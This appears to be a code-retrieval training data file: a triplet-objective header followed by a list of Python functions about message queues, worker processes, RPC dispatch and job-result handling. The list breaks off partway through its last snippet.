{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_results_from_message_queue():\n message_queue.get_result_length()\n logger.info(\"get task results from task queue\")", "def process_messages(self):\n pass", "def _process_worker(call_queue, result_queue):\n while True:\n call_item = call_queue.get(block=True)\n if call_item is None:\n # Wake up queue management thread\n result_queue.put(os.getpid())\n return\n try:\n r = call_item.fn(*call_item.args, **call_item.kwargs)\n except BaseException as e:\n exc = _ExceptionWithTraceback(e, e.__traceback__)\n result_queue.put(_ResultItem(call_item.work_id, exception=exc))\n logger.exception(e) # 主要是直接显示错误。\n else:\n result_queue.put(_ResultItem(call_item.work_id,\n result=r))", "def result(self):\n return Result(self.messages[:])", "def put_internal_result(self, job_result):\n self.internal_result_queue.append(job_result)", "def _do(self):\n # Get all the messages in queue\n msgs = self.RPC.query.all()\n for msg in msgs:\n # Find the first msg marked as enqueued.\n\n if msg.working and \\\n (self.current_time_seconds() - self.millisec_to_sec(msg.updated)) \\\n > self.conf.messaging_server.response_timeout:\n msg.status = message.Message.ENQUEUED\n msg.update(condition=self.working_status_condition)\n\n if not msg.enqueued:\n continue\n if 'plan_name' in list(msg.ctxt.keys()): # Python 3 Conversion -- dict object to list object\n LOG.info('Plan name: {}'.format(msg.ctxt['plan_name']))\n elif 'plan_name' in list(msg.args.keys()): # Python 3 Conversion -- dict object to list object\n LOG.info('Plan name: {}'.format(msg.args['plan_name']))\n\n # Change the status to WORKING (operation with a lock)\n msg.status = message.Message.WORKING\n msg.owner = socket.gethostname()\n # All update should have a condition (status == enqueued)\n _is_updated = msg.update(condition=self.enqueued_status_condition)\n\n if not _is_updated or 'FAILURE' in _is_updated:\n continue\n\n # RPC methods must not start/end with an underscore.\n if msg.method.startswith('_') or msg.method.endswith('_'):\n error_msg = _LE(\"Method {} must not start or end\"\n \"with underscores\").format(msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n # The first endpoint that supports the method wins.\n method = None\n for endpoint in self.endpoints:\n if msg.method not in dir(endpoint):\n continue\n endpoint_method = getattr(endpoint, msg.method)\n if callable(endpoint_method):\n method = endpoint_method\n if self.conf.messaging_server.debug:\n LOG.debug(\"Message {} method {} is \"\n \"handled by endpoint {}\".\n format(msg.id, msg.method,\n method.__str__.__name__))\n break\n if not method:\n error_msg = _LE(\"Message {} method {} unsupported \"\n \"in endpoints.\").format(msg.id, msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n # All methods must take a ctxt and args param.\n if inspect.getfullargspec(method).args != ['self', 'ctx', 'arg']:\n error_msg = _LE(\"Method {} must take three args: \"\n \"self, ctx, arg\").format(msg.method)\n self._log_error_and_update_msg(msg, error_msg)\n return\n\n LOG.info(_LI(\"Message {} method {} received\").format(\n msg.id, msg.method))\n if self.conf.messaging_server.debug:\n LOG.debug(\n _LI(\"Message {} method {} context: {}, args: {}\").format(\n msg.id, msg.method, msg.ctxt, msg.args))\n\n failure = None\n try:\n\n # Add the template to conductor.plan table\n # Methods return an opaque dictionary\n result = method(msg.ctxt, msg.args)\n\n # FIXME(jdandrea): Remove response/error and make it opaque.\n # That means this would just be assigned result outright.\n msg.response = result.get('response', result)\n except Exception:\n # Current sys.exc_info() content can be overridden\n # by another exception raised by a log handler during\n # LOG.exception(). So keep a copy and delete it later.\n failure = sys.exc_info()\n\n # Do not log details about the failure here. It will\n # be returned later upstream.\n LOG.exception(_LE('Exception during message handling'))\n\n try:\n if failure is None:\n msg.status = message.Message.COMPLETED\n else:\n msg.failure = \\\n rpc_common.serialize_remote_exception(failure)\n msg.status = message.Message.ERROR\n LOG.info(_LI(\"Message {} method {}, status: {}\").format(\n msg.id, msg.method, msg.status))\n if self.conf.messaging_server.debug:\n LOG.debug(\"Message {} method {}, response: {}\".format(\n msg.id, msg.method, msg.response))\n\n _is_success = 'FAILURE'\n while 'FAILURE' in _is_success and (self.current_time_seconds() - self.millisec_to_sec(msg.updated)) \\\n <= self.conf.messaging_server.response_timeout:\n _is_success = msg.update()\n LOG.info(_LI(\"updating the message status from working to {}, \"\n \"atomic update response from MUSIC {}\").format(msg.status, _is_success))\n\n except Exception:\n LOG.exception(_LE(\"Can not send reply for message {} \"\n \"method {}\").\n format(msg.id, msg.method))\n finally:\n # Remove circular object reference between the current\n # stack frame and the traceback in exc_info.\n del failure", "def _add_result(self, msg, identity=None):\n receipt = None\n try:\n if isinstance(msg, mplane.model.Envelope):\n # if the result is an envelope containing multijob\n # results, keep the receipt until the multijob ends\n (start, end) = msg.when().datetimes()\n if end < datetime.utcnow():\n if self._supervisor:\n self._exporter.put_nowait([msg, identity])\n\n receipt = self._receipts[msg.get_token()]\n self._remove_receipt(receipt)\n else:\n receipt = self._receipts[msg.get_token()]\n self._remove_receipt(receipt)\n except KeyError:\n pass\n self._results[msg.get_token()] = msg\n\n if not isinstance(msg, mplane.model.Exception):\n if msg.get_label():\n self._result_labels[msg.get_label()] = msg\n else:\n # Exceptions are only added to result_labels if a receipt existed in receipts -WHY\n if receipt is not None:\n self._result_labels[receipt.get_label()] = msg", "def application_message(self, bus, msg):\n msgtype = msg.structure.get_name()\n if msgtype == 'partial_result':\n self.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n if msgtype == 'result':\n self.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def application_message(self, bus, msg):\n msgtype = msg.structure.get_name()\n if msgtype == 'partial_result':\n self.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n if msgtype == 'result':\n self.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n raise timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])", "def received_job_from_worker(self, arguments, result, worker_name):\n # Find the correct job.\n job = [_i for _i in self._workers[worker_name].active_jobs\n if _i.arguments == arguments]\n if len(job) == 0:\n msg = (\"MASTER: Job %s from worker %i not found. All jobs: %s\\n\" %\n (str(arguments), worker_name,\n str(self._workers[worker_name].active_jobs)))\n raise ValueError(msg)\n if len(job) > 1:\n raise ValueError(\"WTF %i %s %s\" % (\n worker_name, str(arguments),\n str(self._workers[worker_name].active_jobs)))\n job = job[0]\n job.result = result\n\n self._workers[worker_name].active_jobs.remove(job)\n self._workers[worker_name].completed_jobs_count[0] += 1\n self._finished_jobs.append(job)", "def _process_json_rpc_message(self, msg, msg_id):\n future = self._pending_requests.get(msg_id, None)\n if future:\n error = msg.get('error', None)\n result = msg.get('result', None)\n if error:\n future.set_result(error)\n else:\n future.set_result(result)\n else:\n self._logger.error(\n \"Message received without a matching pending request! '{}'\".format(msg))", "def put_external_result(self, job_result):\n self.result_queue.append(job_result)", "def process_queue_item(self, job_details):\n raise NotImplementedError(\"Workers must implement run.\")", "def on_get_result(self):\n if not self.queue.empty():\n self.update_status(self.queue.get(0))\n if self.worker_process.is_alive():\n self.master.after(self.query_delay, self.on_get_result)\n return\n else:\n self.exec_btn.config(state=Tkinter.NORMAL)", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\t\tself.pipeline.set_state(gst.STATE_PAUSED)", "def _r_process_message(self, result, protocol):\n if isinstance(result.original_message, SubscribeMessage):\n self._r_subscribe_to_event(result.original_message.service_name,\n result.original_message.event_name,\n protocol)\n \n return result.response", "def work(self, job):\n pass", "def _on_result(self, result_type, result_data):\n self._log.info(\"Sending result\")\n self._host_comms.send_msg(\"result\", {\"type\": result_type, \"data\": result_data})", "def handle_result(self, results: List[Dict], **info):\n pass", "def _process_incoming_queue_messages(self):\n while self._queue.qsize():\n msg = self._queue.get()\n if msg == MAP_UPDATE:\n self._clear_measurement_progress_label()\n self._presenter.update_map(self.chosen_value.get())", "def _dispatch_messages(self):\n while True:\n select_obj = (yield)\n if select_obj == self._message_queue.selobj:\n msg = self._message_queue.get_nowait()\n if msg is not None:\n msg_type = msg.get('type', None)\n if msg_type is not None:\n msg_handler = self._message_handlers.get(msg_type, None)\n if msg_handler is not None:\n msg_handler(msg['data'])", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n \"\"\" Query all repos with repo url of given task \"\"\"\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['git_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'badges':\n self.badges_model(message, repo_id)\n except Exception as e:\n register_task_failure(self, logging, message, repo_id, e)\n pass", "def _process_message(self, obj):\n pass", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def processMessage(self, *args, **kwargs):\r\n pass", "def _handle_result(self, result):\n if self.result_callback != None:\n #Call the result callback but expect failure.\n try:\n self.result_callback(result, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in result handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.logg.error(\"Error: no on_result defined for '{cmd!r}' command result: {res!r}.\",cmd=self.command,res=result)", "def _process_data(f, work_queue, results_queue):\n for element in iter(work_queue.get, FINISHED):\n try:\n results_queue.put(f(element))\n except Exception, work_error:\n LOG.critical('parallel_pc Error: {0}\\n\\n\\tconfig settings {1}\\n'.format(work_error, element))\n results_queue.put(FINISHED)", "def process_result(self, result: Any) -> None:\n raise NotImplementedError()", "def on_result(self, result):\n # we create a self.results list to store the results as they come back from the process() method\n self.results.append(result)", "def process(self, msg):\n raise NotImplemented", "def test_process_message_queue(self):\n t = threading.Thread(target=self.handle_message_queue)\n t.start()\n\n self.dut._process_message_queue()\n\n t.join()", "def service_queue(queue, result_id, dut, dut_id):\n mdb = get_autotest()\n ldb = get_logging()\n count = 0\n while 1:\n mesg =queue.get()\n if mesg == 'finish':\n print >>sys.stderr, '[logged %d lines to %s for %s]' % (\n count, result_id, dut)\n break\n (ts, kind, message) = mesg\n count += 1\n if type(message) ==type(''):\n message = unicode(message, encoding='utf8')\n if type(kind) == type(''):\n kind = unicode(kind, encoding = 'utf8')\n handle = '%s_%d_%f_%s' % (dut if dut else dut_id, count, ts, HOSTNAME)\n \n terms = {'message':message, 'kind': kind, 'time': ts, '_id': handle}\n if dut_id:\n terms['dut_id'] = dut_id\n if dut:\n terms['dut_name'] = dut\n if result_id:\n terms['result_id'] = result_id\n if kind in ['HEADLINE', 'RESULT'] and result_id and dut:\n rdoc = mdb.results.find_one({'_id':result_id})\n if rdoc:\n build = rdoc.get('build')\n if build:\n set_build_information(build, \n {'test_status': [ts, dut, message]})\n else:\n print 'no build for headline'\n else:\n print 'no result for headline'\n ldb.logs.save(terms)", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def _work_function(job_q, result_q, error_q):\r\n # type: (Queue, Queue, Queue) -> None\r\n while True:\r\n job = job_q.get()\r\n\r\n if isinstance(job, _ThreadPoolSentinel):\r\n # All the work is done, get out\r\n result_q.put(_ThreadPoolSentinel())\r\n error_q.put(_ThreadPoolSentinel())\r\n job_q.task_done()\r\n break\r\n\r\n function = job[0]\r\n args = job[1]\r\n try:\r\n result = function(*args)\r\n except Exception as e:\r\n error_q.put((job, e))\r\n else:\r\n result_q.put((job, result))\r\n finally:\r\n job_q.task_done()", "def process(self, results):\n raise NotImplementedError", "def _handle_execute_result(self, msg):\n self.log.debug(\"execute_result: %s\", msg.get('content', ''))\n if self.include_output(msg):\n self.flush_clearoutput()\n content = msg['content']\n prompt_number = content.get('execution_count', 0)\n data = content['data']\n metadata = msg['content']['metadata']\n if 'image/svg+xml' in data:\n self._pre_image_append(msg, prompt_number)\n self._append_svg(data['image/svg+xml'], True)\n self._append_html(self.output_sep2, True)\n elif 'image/png' in data:\n self._pre_image_append(msg, prompt_number)\n png = b64decode(data['image/png'].encode('ascii'))\n self._append_png(png, True, metadata=metadata.get('image/png',\n None))\n self._append_html(self.output_sep2, True)\n elif 'image/jpeg' in data and self._jpg_supported:\n self._pre_image_append(msg, prompt_number)\n jpg = b64decode(data['image/jpeg'].encode('ascii'))\n self._append_jpg(jpg, True, metadata=metadata.get('image/jpeg',\n None))\n self._append_html(self.output_sep2, True)\n elif 'text/latex' in data:\n self._pre_image_append(msg, prompt_number)\n try:\n self._append_latex(data['text/latex'], True)\n except LatexError:\n return super(RichJupyterWidget, self)._handle_display_data(msg)\n self._append_html(self.output_sep2, True)\n else:\n # Default back to the plain text representation.\n return super(RichJupyterWidget, self)._handle_execute_result(msg)", "def _worker(\n self, work_queue: Queue, done_queue: Queue, build_results: bool = True\n ):\n for chunk in iter(work_queue.get, \"STOP\"):\n interactions = self._play_matches(chunk, build_results)\n done_queue.put(interactions)\n done_queue.put(\"STOP\")\n return True", "def store(self, job, result):\n pass", "def handleMessage(msg):", "def get_external_result(self):\n while True:\n if len(self.result_queue) > 0:\n result = copy.deepcopy(self.result_queue[0])\n del self.result_queue[0]\n return result", "def handle_message(self, message):", "def _add_message(self, message):\r\n self.result = self.result + message", "def send_msg(self, my_queue, my_msg):", "def manageResults(self, name=None):\n job, name = self.getJob(name)\n if job.error() != None:\n print 'job had an error, use view details'\n elif job.state() == 'Finished':\n self.showPEATSAResultsDialog(job, name)\n else:\n print 'Job is not finished yet.'\n return", "async def process(self, message):\n return await self.dispatcher.dispatch(message)", "def __call__(self, graph):\n result = graph.sqs_message_dispatcher.handle_batch()\n if not result.message_count:\n raise SleepNow()", "def process_message(self, message_body, message_id, queue):\n\n # Unpack the message.\n try:\n message_body = pickle.loads(message_body)\n identifier = message_body['identifier']\n remove = message_body.get('remove')\n except Exception, error:\n # There was a major problem with this message. Accept the message\n # since it's not likely to be a service availability problem.\n logging.error('Invalid message: %s' % error)\n queue.ack(message_id)\n return\n\n def update_search_index():\n update_object(identifier, remove=remove, exception_handling=False)\n\n try:\n\n retry = False\n\n try:\n update_search_index()\n except self.RetryExceptions as error:\n retry = True\n logging.warning('Problem while processing %r: %s' % (identifier, error))\n self.on_error(error)\n time.sleep(1)\n update_search_index()\n\n queue.ack(message_id)\n\n except Exception as error:\n\n if retry:\n\n # There was still an error after retrying. This is likely to be\n # a service availability issue, so log a critical error message\n # and DON'T accept the message. It will try again next time\n # this script runs / the daemon is restarted.\n logging.critical('Could not process %r: %s' % (identifier, error))\n logging.error('Not accepting message for %r' % identifier)\n\n else:\n\n # All hell has broken loose and it's probably a code problem.\n # It's probably not a service availability issue, so only log\n # an error level message, and accept the message so it doesn't\n # clog up the queue.\n logging.error('Unhandled error while processing %r: %s' % (identifier, error))\n queue.ack(message_id)", "def process_messages(self, messages):\n\n return messages", "def do_work(self):", "def workerFinished(self, ret):\n self.worker.deleteLater()\n self.thread.quit()\n self.thread.wait()\n self.thread.deleteLater()\n # remove widget from message bar\n self.iface.messageBar().popWidget(self.messageBar)\n if ret is not None:\n # report the result\n #layer, total_area = ret\n self.iface.messageBar().pushMessage('Finished!')\n else:\n # notify the user that something went wrong\n self.iface.messageBar().pushMessage('Job cancelled.', level=QgsMessageBar.WARNING, duration=3)", "def queueStatusAll():", "def test_result_queue_basic(start_result_q_publisher):\n result_pub = start_result_q_publisher()\n publish_messages(result_pub, 10)\n try_assert(lambda: result_pub._mq_chan is not None, \"Required for cleanup\")\n result_pub._mq_chan.queue_purge(\"results\")\n result_pub.stop()", "def OnResult1(self, event):\r\n \r\n if event.data is None:\r\n # Thread aborted (using our convention of None return)\r\n print('GPIB data aborted'), time.strftime(\"%a, %d %b %Y %H:%M:%S\", Time)\r\n else:\r\n # Process results here\r\n print'GPIB Result: %s' % event.data,time.strftime(\"%a, %d %b %Y %H:%M:%S\", Time)\r\n \r\n \r\n # In either event, the worker is done\r\n self.worker1 = None", "def process_message(self, msg, src):", "def handle_result(self,result,event):\r\n # If the result is a number, according to the design we\r\n if isinstance(result,(int,float)):\r\n event.time=self.time+result\r\n # Hint: The reason which this event is added back to the queue is because the function executed is a generator.\r\n # That is to say, that function used a \"yield\" command. In the first round of execution, it yields the delay\r\n # time. Then, the event is added back to the queue to be executed the second time. In the second round, the\r\n # execution starts from where it left off in the first round. If you are not familiar with the concept of\r\n # generator, this is confusing. I was confused for a while. I recommend you figure out what a generator is\r\n # first.)-->\r\n self.add_event(event)\r\n # If the result is a dictionary,\r\n elif isinstance(result,dict):\r\n event.time=self.time+result.get('delay',0)\r\n event.priority=result.get('priority',event.priority)\r\n # If you are confused about why this event is added back to the queue, please refer to the above hint.\r\n self.add_event(event)\r\n elif isinstance(result,(str,Trigger)):\r\n event.time=None\r\n if result not in self.triggers:\r\n # Here we add function executions to the self.triggers dictionary.\r\n self.triggers[result]=[event]\r\n else:\r\n self.triggers[result].append(event)\r\n elif isinstance(result,(list,tuple)):\r\n events=[copy.copy(event) for r in result]\r\n for e in events: e.group=events\r\n for i,r in enumerate(result):\r\n self.handle_result(r,events[i])\r\n elif result is None:\r\n if event.parent is not None:\r\n event.parent.time=self.time\r\n self.add_event(event.parent)\r\n elif isinstance(result,Event):\r\n if result.generator and event.generator:\r\n result.parent=event\r\n elif hasattr(result,'default_trigger'):\r\n self.handle_result(result.default_trigger,event)\r\n else:\r\n raise SchedulerError(\"Incorrect 'yield': %s\"%(result))", "def success_message_addon(self, queue, result):\n updated_issues_count, delay = result\n return ' [updated=%d]' % updated_issues_count", "def _messages(self):\n q = [json.loads(i)['message'] for i in self.client.kv.get(\n 'rhumba.q.testqueue', [])]\n return q", "def check_plugin(work_queue, result_queue):\n while work_queue.qsize():\n host = work_queue.get()\n result = commands.getoutput(plugin_cmd + \" -H \" + host)\n result_queue.put([host, result])", "def get_internal_result(self):\n if len(self.internal_result_queue) > 0:\n result = copy.deepcopy(self.internal_result_queue[0])\n del self.internal_result_queue[0]\n return result", "def handle(self, message):", "def _process_redis_message(self, msg, msg_id):\n msg_result = msg['result']\n processed = False\n if msg_id == 'redis-pubsub-init':\n processed = True # Nothing to do really.\n if not processed:\n if self._on_update:\n self._io_loop.add_callback(self._on_update, msg_result)\n else:\n self._logger.warn('Ignoring message (no on_update_callback): %s',\n msg_result)", "def _process_batch(self, subqueue):\n try:\n timeoutCall = None\n jo = None\n if self.max_batch_size == 1:\n #At time of writing, the regular nodes have broken JSON-RPC batch handling.\n #So when max_batch_size is set to one, we assume we need to work around this fact.\n jo = json.dumps(self.entries[subqueue[0]]._get_rpc_call_object())\n else:\n #The api.steemitstage.com node properly supports JSON-RPC batches, and so, hopefully soon, will the other nodes.\n qarr = list()\n for num in subqueue:\n qarr.append(self.entries[num]._get_rpc_call_object())\n jo = json.dumps(qarr)\n url = \"https://\" + self.nodes[self.node_index] + \"/\"\n url = str.encode(url)\n deferred = self.agent.request('POST',\n url,\n Headers({\"User-Agent\" : ['Async Steem for Python v0.6.1'],\n \"Content-Type\": [\"application/json\"]}),\n _StringProducer(jo))\n def process_one_result(reply):\n \"\"\"Process a single response from an JSON-RPC command.\"\"\"\n try:\n if \"id\" in reply:\n reply_id = reply[\"id\"]\n if reply_id in self.entries:\n match = self.entries[reply_id]\n if \"result\" in reply:\n #Call the proper result handler for the request that this response belongs to.\n match._handle_result(reply[\"result\"])\n else:\n if \"error\" in reply and \"code\" in reply[\"error\"]:\n msg = \"No message included with error\"\n if \"message\" in reply[\"error\"]:\n msg = reply[\"error\"][\"message\"]\n #Call the proper error handler for the request that this response belongs to.\n match._handle_error(reply[\"error\"][\"code\"], msg)\n else:\n self.log.error(\"Error: Invalid JSON-RPC response entry. {node!r}.\",node = self.nodes[self.node_index])\n #del self.entries[reply_id]\n else:\n self.log.error(\"Error: Invalid JSON-RPC id in entry {rid!r}. {node!r}\",rid=reply_id, node = self.nodes[self.node_index])\n else:\n self.log.error(\"Error: Invalid JSON-RPC response without id in entry: {reply!r}: {node!r}\",reply=reply, node = self.nodes[self.node_index])\n except Exception as ex:\n self.log.failure(\"Error in _process_one_result {err!r}, {node!r}\",err=str(ex), node = self.nodes[self.node_index])\n def handle_response(response):\n \"\"\"Handle response for JSON-RPC batch query invocation.\"\"\"\n try:\n #Cancel any active timeout for this HTTPS call.\n if timeoutCall.active():\n timeoutCall.cancel()\n def cbBody(bodystring):\n \"\"\"Process response body for JSON-RPC batch query invocation.\"\"\"\n try:\n results = None\n #The bosy SHOULD be JSON, it not always is.\n try:\n results = json.loads(bodystring)\n except Exception as ex:\n #If the result is NON-JSON, may want to move to the next node in the node list\n self.log.error(\"Non-JSON response from server {node!r}\", node = self.nodes[self.node_index])\n self._next_node()\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n if results != None:\n ok = False\n if isinstance(results, dict):\n #Running in legacy single JSON-RPC call mode (no batches), process the result of the single call.\n process_one_result(results)\n ok = True\n else:\n if isinstance(results, list):\n #Running in batch mode, process the batch result, one response at a time\n for reply in results:\n process_one_result(reply)\n ok = True\n else:\n #Completely unexpected result type, may want to move to the next node in the node list.\n self.log.error(\"Error: Invalid JSON-RPC response, expecting list as response on batch. {node!r}\",node = self.nodes[self.node_index])\n self._next_node()\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n if ok == True:\n #Clean up the entries dict by removing all fully processed commands that now are no longer in the queu.\n for request_id in subqueue:\n if request_id in self.entries:\n del self.entries[request_id]\n else:\n self.log.error(\"Error: No response entry for request entry in result: {rid!r}. {node!r}\",rid=request_id, node = self.nodes[self.node_index])\n except Exception as ex:\n self.log.failure(\"Error in cbBody {err!r}. {node!r}\",err=str(ex), node = self.nodes[self.node_index])\n #This HTTPS POST is now fully processed.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred2 = readBody(response)\n deferred2.addCallback(cbBody)\n return deferred2\n except Exception as ex:\n self.log.failure(\"Error in handle_response {err!r}. {node!r}\",err=str(ex),node = self.nodes[self.node_index])\n #If something went wrong, the HTTPS POST isn't active anymore.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred.addCallback(handle_response)\n def _handle_error(error):\n \"\"\"Handle network level error for JSON-RPC request.\"\"\"\n try:\n #Abandon any active timeout triggers\n if timeoutCall.active():\n timeoutCall.cancel()\n #Unexpected error on HTTPS POST, we may want to move to the next node.\n self.log.error(\"Error on HTTPS POST : {cls!r} : {err!r}. {node!r}\",cls=error.type.__name__,err=error.getErrorMessage(),node = self.nodes[self.node_index])\n self._next_node()\n except Exception as ex:\n self.log.failure(\"Error in _handle_error {err!r}. {node!r}\",err=str(ex),node = self.nodes[self.node_index])\n #Add the failed sub-queue back to the command queue, we shall try again soon.\n self.queue = subqueue + self.queue\n ##If something went wrong, the HTTPS POST isn't active anymore.\n self.active_call_count = self.active_call_count - 1\n #Invoke self, possibly sending new queues RPC calls to the current node\n self()\n deferred.addErrback(_handle_error)\n timeoutCall = self.reactor.callLater(self.rpc_timeout, deferred.cancel)\n #Keep track of the number of active parallel HTTPS posts.\n self.active_call_count = self.active_call_count + 1\n return deferred\n except Exception as ex:\n self.log.failure(\"Error in _process_batch {err!r}. {node!r}\",err=str(ex),node = self.nodes[self.node_index])", "def queue_wrapper(result_queue, wid,\n func, args):\n result_queue.put((wid, func(*args)))", "def worker(my_idx, inq, outq):\n print(\"worker %d: starting\" % my_idx)\n backoff = .001\n while True:\n cmd = inq.get()\n if cmd is None:\n break\n ridx, creds, cmds = cmd\n backoff = max(backoff / 2, 0.001)\n while True:\n try:\n responses = Gmail.batch_executor(creds, cmds)\n except Gmail.UserRateException:\n print(f'worker {my_idx}: backoff {backoff} sec')\n sleep(backoff)\n backoff = min(backoff * 2, 1.0)\n except Exception as ex:\n outq.put([ridx, ex])\n break\n else:\n outq.put([ridx, responses])\n break\n inq.task_done()\n print(\"worker %d stoping\" % my_idx)", "def process_results(self):\n return self._do_action_under_lock(self._process_results)", "def _proto_step_result(self, message, step_name):\n res = json_format.MessageToDict(message)\n return self.step_data(\n step_name,\n self.m.json.output_stream(res),\n )", "def _workout_messages(self, msgs_bunch):\n if msgs_bunch != []:\n while True:\n r = requests.post(self.url, headers = self.headers, data = json.dumps(msgs_bunch))\n # request success condition below - to end the handler\n if r.status_code == 200:\n break\n print('http_handler: failed to retranslate messages, try again in ' + str(self.timeout) + ' sec')\n time.sleep(self.timeout)\n # next bunch of messages will not be read until this function ends\n # current bunch of messags will be deleted in next request if delete_flag = True is set", "def process_resp(self, msg, operation, status, index):\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, operation)\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, status))\n if status == \"0\":\n self.cause.extend(msg)\n metric = \"%s.%d.%s\" % (METRIC_NAME, index, \"health\")\n analyse_status = MonitorStatus[\"red\"]\n self.results.append(Event(TIMESTAMP_MILLIS(), \"opentsdb\", metric, msg, analyse_status))", "def on_task_result(self, task_id, raw_result):\n raise NotImplementedError", "def _process_msg(cls, msg):\n raise NotImplementedError", "def process_thread(self):", "def _process_results(self, *args, **kwargs): # noqa: E501\n # Lock before processing results to prevent conflicts\n if not self._acquire_pr_lock():\n return\n\n # Get the future instance\n future = self.future\n\n # Skip if no Future\n if not future:\n return\n\n # Skip processing results if forget\n if self.forget:\n # Clean up client\n self.client.close()\n return\n\n try:\n # Get results using the client\n result = self.client.gather(future)\n except Exception as e:\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n # Clean up client\n self.client.close()\n result = e\n log.warning(\n 'Exception encountered when retrieving results: \"{}\"'.format(str(e))\n )\n\n # Tell scheduler to stop sending updates about this key\n self.client.set_metadata(self.key, False)\n\n # Handle custom process results function\n if self.process_results_function:\n # Get the process_results_function in TethysJob and call it with the result retrived\n try:\n result = self.process_results_function(result)\n except Exception as e:\n log.exception(\"Process Results Function Error\")\n self._status = \"ERR\"\n result = str(e)\n\n # Serialize the result\n try:\n self.result = result\n except Exception:\n log.exception(\"Results Serialization Error\")\n self._status = \"ERR\"\n else:\n self._status = \"COM\" if self._status != \"ERR\" else \"ERR\"\n\n # Erase the key to avoid problem with dask recycle key\n self.key = \"\"\n\n # save the results or status in the database\n self.save()\n\n # Clean up client\n self.client.close()\n\n if client_fire_forget:\n client_fire_forget.close()\n\n self._release_pr_lock()", "def handle_message(self, msg):\n pass", "def process(self, message: Message, **kwargs: Any) -> None:", "def request(self, *args, **kwargs):\n self.work_request_queue.put((args, kwargs))\n return self.result_queue.get()", "def request(self, *args, **kwargs):\n self.work_request_queue.put((args, kwargs))\n return self.result_queue.get()", "def handle_message(self, data, task_type, msgtype):\n data['message'] = data['message'].upper()\n return data", "def test_dispatch_raw(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.foo'), [])\n msg = msg_helper.make_inbound('message')\n yield worker_helper.dispatch_raw('fooconn.foo', msg)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.foo'), [msg])", "def _process_message(self, message: pubsub_message.Message) -> None:\n # Extract the task proto from the message.\n try:\n task = task_pb2.Task.FromString(message.data)\n except proto_message.DecodeError as e:\n 